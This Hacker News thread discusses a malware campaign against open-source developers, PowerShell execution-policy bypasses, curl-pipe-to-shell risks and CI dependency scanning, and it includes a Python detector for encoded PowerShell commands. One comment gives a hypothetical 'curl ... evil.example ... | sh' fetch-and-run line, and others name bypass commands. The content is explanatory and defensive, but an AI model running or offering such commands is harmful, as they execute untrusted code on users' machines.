Open-source developers are understandably high value targets, but I'd imagine they're harder to hit with this kind of attack.
This is not a security feature, and should not be relied upon.
For example, unelevated users can run the following command:
'PS> Set-ExecutionPolicy Bypass -Scope Process' to allow script execution in the current PowerShell process.
Also, you can pass complete PowerShell scripts over the command line, which bypasses the script restriction (because you can just input your entire script over the command line).
This is done with the -E (-EncodedCommand) flag, which takes a base64-encoded string with statements separated by semicolons.
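As an added defender-side illustration of the point above (not code from the thread or the article), a small Python checker that flags process command lines invoking PowerShell with an execution-policy bypass or an -EncodedCommand payload, and decodes the latter so an analyst can read what actually ran. The sample command lines are constructed, and PowerShell's parameter-prefix matching is approximated.

```python
import base64
import re
import shlex

# Case-insensitive match for an in-script policy change like the one quoted above.
POLICY_RE = re.compile(r"set-executionpolicy\s+(bypass|unrestricted)", re.I)
POWERSHELL_EXES = {"powershell.exe", "powershell", "pwsh.exe", "pwsh"}

def decode_encoded_command(b64: str):
    """-EncodedCommand takes base64 of UTF-16LE text; return None if it does not decode."""
    try:
        return base64.b64decode(b64.strip('"'), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_command_line(cmdline: str) -> dict:
    """Flag execution-policy bypasses and encoded payloads in one process command line."""
    result = {"is_powershell": False, "policy_bypass": False, "encoded": False, "decoded": None}
    tokens = shlex.split(cmdline, posix=False)  # non-POSIX mode keeps Windows backslashes intact
    if not tokens:
        return result
    exe = tokens[0].strip('"').lower().rsplit("\\", 1)[-1]
    if exe not in POWERSHELL_EXES:
        return result
    result["is_powershell"] = True
    for i, tok in enumerate(tokens[1:], start=1):
        if not tok.startswith("-"):
            continue
        name = tok[1:].lower()
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        # Approximation: PowerShell accepts unambiguous prefixes (-e, -enc, ...) plus the -ec alias.
        if name == "ec" or (name and "encodedcommand".startswith(name)):
            result["encoded"] = True
            result["decoded"] = decode_encoded_command(nxt)
        elif name == "ep" or (len(name) >= 2 and "executionpolicy".startswith(name)):
            if nxt.strip('"').lower() in ("bypass", "unrestricted"):
                result["policy_bypass"] = True
    # Also scan the visible text and any decoded payload for Set-ExecutionPolicy.
    if POLICY_RE.search(cmdline + " " + (result["decoded"] or "")):
        result["policy_bypass"] = True
    return result

def suspicious_lines(cmdlines):
    """Return the command lines worth an analyst's attention."""
    flagged = [c for c in cmdlines if analyze_command_line(c)["encoded"]]
    return [c for c in cmdlines if c in flagged or analyze_command_line(c)["policy_bypass"]]

# Constructed sample process-creation command lines (not taken from the article).
SAMPLE_COMMAND_LINES = [
    'powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\build\\deploy.ps1',
    "powershell.exe -nop -w hidden -e "
    + base64.b64encode('Write-Host "hello"; Get-Date'.encode("utf-16-le")).decode(),
    "notepad.exe C:\\notes.txt",
    'powershell.exe -Command "Set-ExecutionPolicy Bypass -Scope Process; .\\run.ps1"',
]
```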
That's true, but it's not unreasonable to foresee the creators making OSX/Linux versions too if these Windows ones "go ok" from their point of view. :(
What's worrying to me is the wording of the emails themselves. It's much better, and more likely appearing "legit" than the vast multitude of scam/trojan/similar .pdf/.xls/.doc/.lnk/etc emails I've seen. (several a day generally)
With the now-current curl | sh pattern, one just needs some MITM attack, or even just to trick someone into doing it, as the majority never look at the contents of the shell script.
Which is why it could only be done in a VM. VM breakout is still a risk, but at the end of the day it's only ever about mitigation, not a panacea. A startling number of people use this method too, what with the plethora of package managers available. The evildoer's best friend is laziness: just keep going longer than someone on average would reasonably expect you to, i.e. not very.
I've been worrying about this for some time. I regularly get customers sending screenshots inside Word documents; a well-targeted email could easily get past my defences.
This is why most companies have a build step in their CI/CD pipeline that scans for CVEs/malware in their app's dependencies (jars, npm packages, Ruby gems, etc.).
While the concept sounds sound, so far I've never actually seen this setup in the real world. Do you happen to have any resources on how to properly set up such a step in a CI tool?
Check out software like Twistlock, Sonatype, and I think Tenable has a scanner as well that integrates into the pipeline. If you are not using Sonatype to build, you can find good support for this in Jenkins or TeamCity via a plugin.
(Full disclosure, I work in this area)
Submitters: please submit original sources, as the site guidelines ask (https://news.ycombinator.com/newsguidelines.html). Myriads of blog posts and articles mostly just point to something else; be a good HN submitter and do the pointer traversal for the rest of us.
In all honesty, Ars does a real value-add in this case. I'm an open source developer on Windows so this feels relevant, but the original article forces me to read through a very long, highly technical article full of HTTP logs and hex dumps just to find out how this could impact me. About halfway through I gave up and then I was happy I found your comment with the Ars link.
I submitted the Ars one instead of the original source, as the Ars one is much more approachable than the original source, and I didn't see the previous submission. Which is weird, as I searched first. Bad me. :/
That being said, the PAN post definitely has the better detail once a person groks what it's about. :)
If I was some evil-doer though I'd develop some marketing heavy Javascript/Rust/language-of-the-week framework, hit HN frontpage and have the call-to-action copy be:
> Install in picoseconds!
> curl -sf http://evil.example/evil_install.sh | sh
edit: corrected hypothetical attack